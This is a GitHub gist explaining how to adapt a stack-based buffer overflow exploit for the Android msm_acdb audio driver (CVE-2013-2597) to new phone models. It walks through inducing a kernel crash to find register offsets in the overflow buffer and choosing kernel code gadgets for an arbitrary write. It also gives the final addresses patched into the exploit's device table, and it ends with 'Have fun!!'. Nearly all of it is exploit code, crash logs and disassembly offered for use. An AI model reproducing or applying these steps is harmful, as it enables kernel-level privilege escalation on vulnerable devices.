Skip to content

Instantly share code, notes, and snippets.

@fi01
Created July 28, 2013 04:42
Show Gist options
  • Save fi01/6097436 to your computer and use it in GitHub Desktop.
Save fi01/6097436 to your computer and use it in GitHub Desktop.
Stack-based buffer overflow in acdb audio driver (CVE-2013-2597)
To use msm_acdb explot we need to work 4 steps.
1. Find how to run command with root or system previlege
2. Get offset for registers to setup
3. Choose proper code in kernel image
4. Setup parameters in acdb.c
1. Find how to run command with root or system previlege
Do it your self. :-P
2. Get offset for registers to setup
- Add dummy entry to get crach log.
--- a/acdb.c
+++ b/acdb.c
@@ -43,6 +43,7 @@ static supported_device supported_devices[] = {
{ DEVICE_SH04E_01_00_02, { 0x7c, 0x88, { 0x8c, 0xc02498e0 }, { 0xac, 0xc000dd1c } } },
{ DEVICE_SH04E_01_00_03, { 0x7c, 0x88, { 0x8c, 0xc0249a20 }, { 0xac, 0xc024bdd8 } } },
{ DEVICE_SH04E_01_00_04, { 0x7c, 0x88, { 0x8c, 0xc0249a20 }, { 0xac, 0xc024bdd8 } } },
+ { DEVICE_SH05E_01_00_05, { 0, 0, { 0, 0}, { 0, 0} } },
{ DEVICE_SO04D_7_0_D_1_137, { 0x80, 0x90, { 0x9c, 0xc0326a38 }, { 0xbc, 0xc0526964 } } },
{ DEVICE_SO05D_7_0_D_1_137, { 0x80, 0x90, { 0x9c, 0xc03265d8 }, { 0xbc, 0xc0524d84 } } },
{ DEVICE_SOL21_9_1_D_0_395, { 0x7c, 0x88, { 0x8c, 0xc0244778 }, { 0xac, 0xc000dd24 } } },
- Build tool
- Stop services to avoid lost data
- Run tool with root or system previlege
It will be reboot due to cause kernel panic.
- See crash log
(e.g. /proc/last_kmsg or log partition)
<3>[ 348.770486] ACDB=> ACDB ioctl not found!
<1>[ 348.770547] Unable to handle kernel NULL pointer dereference at virtual address 0000009c
<1>[ 348.770608] pgd = df18c000
<1>[ 348.770639] [0000009c] *pgd=9b727831, *pte=00000000, *ppte=00000000
<0>[ 348.770700] Internal error: Oops: 80000007 [#1] PREEMPT SMP
<4>[ 348.770761] Modules linked in:
<4>[ 348.770791] CPU: 0 Not tainted (3.0.8 #1)
<4>[ 348.770853] PC is at 0x9c
<4>[ 348.770883] LR is at acdb_ioctl+0x740/0x860
<4>[ 348.770944] pc : [<0000009c>] lr : [<c0137658>] psr: 60000013
<4>[ 348.770944] sp : ce513f28 ip : 00000000 fp : 00000098
<4>[ 348.771005] r10: 00000094 r9 : 00000090 r8 : 0000008c
<4>[ 348.771066] r7 : 00000088 r6 : 00000084 r5 : 00000080 r4 : 0000007c
<4>[ 348.771097] r3 : 00000000 r2 : ce513e74 r1 : c0973db8 r0 : 00000000
<4>[ 348.771158] Flags: nZCv IRQs on FIQs on Mode SVC_32 ISA ARM Segment user
You'll found offset for register in buffer.
R4 : 0x7c
R5 : 0x80
R6 : 0x84
R7 : 0x88
R8 : 0x8c
R9 : 0x90
R10: 0x94
R11: 0x98
PC : 0x9c
- Disassemble do_vfs_ioctl and check return code
c021d8fc: e2 8d d0 44 ADD SP, SP, #$44
c021d900: e8 bd 83 f0 LDMUW [SP], { R4-R9, PC }
You'll found add 0x44 bytes to SP and restore register R4-R9 and PC.
3. Choose proper code in kernel image
- Choose code to write value and to end do_vfs_ioctl code from kernel image
They should use same size on stack and restore same registers with do_vfs_ioctl like this:
write code: use R9 as write address and R5 as write value, and use 0x20 bytes
c0381b98: e5 89 50 00 STR R5, [R9]
c0381b9c: e8 bd 87 f0 LDMUW [SP], { R4-R10, PC }
end do_vfs_ioctl code: use 0x24 bytes (=0x44 - 0x20) and restore R4-R9 and PC
c0231b98: e2 8d d0 24 ADD SP, SP, #$24
c0231b9c: e8 bd 83 f0 LDMUW [SP], { R4-R9, PC }
4. Setup parameters in acdb.c
- Setup parameters in acdb.c
Write value is R5, offset = 0x80
Write address is R9, offset = 0x90
Write code is offset 0x9c and address = 0xc0381b98
End do_vfs_ioctl code is offset 0xbc (=0x9c + 0x20) and address = 0xc0231b98
--- a/acdb.c
+++ b/acdb.c
@@ -43,6 +43,7 @@ static supported_device supported_devices[] = {
{ DEVICE_SH04E_01_00_02, { 0x7c, 0x88, { 0x8c, 0xc02498e0 }, { 0xac, 0xc000dd1c } } },
{ DEVICE_SH04E_01_00_03, { 0x7c, 0x88, { 0x8c, 0xc0249a20 }, { 0xac, 0xc024bdd8 } } },
{ DEVICE_SH04E_01_00_04, { 0x7c, 0x88, { 0x8c, 0xc0249a20 }, { 0xac, 0xc024bdd8 } } },
+ { DEVICE_SH05E_01_00_05, { 0x80, 0x90, { 0x9c, 0xc0381b98 }, { 0xbc, 0xc0231b98} } },
{ DEVICE_SO04D_7_0_D_1_137, { 0x80, 0x90, { 0x9c, 0xc0326a38 }, { 0xbc, 0xc0526964 } } },
{ DEVICE_SO05D_7_0_D_1_137, { 0x80, 0x90, { 0x9c, 0xc03265d8 }, { 0xbc, 0xc0524d84 } } },
{ DEVICE_SOL21_9_1_D_0_395, { 0x7c, 0x88, { 0x8c, 0xc0244778 }, { 0xac, 0xc000dd24 } } },
That's all. Have fun!!
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment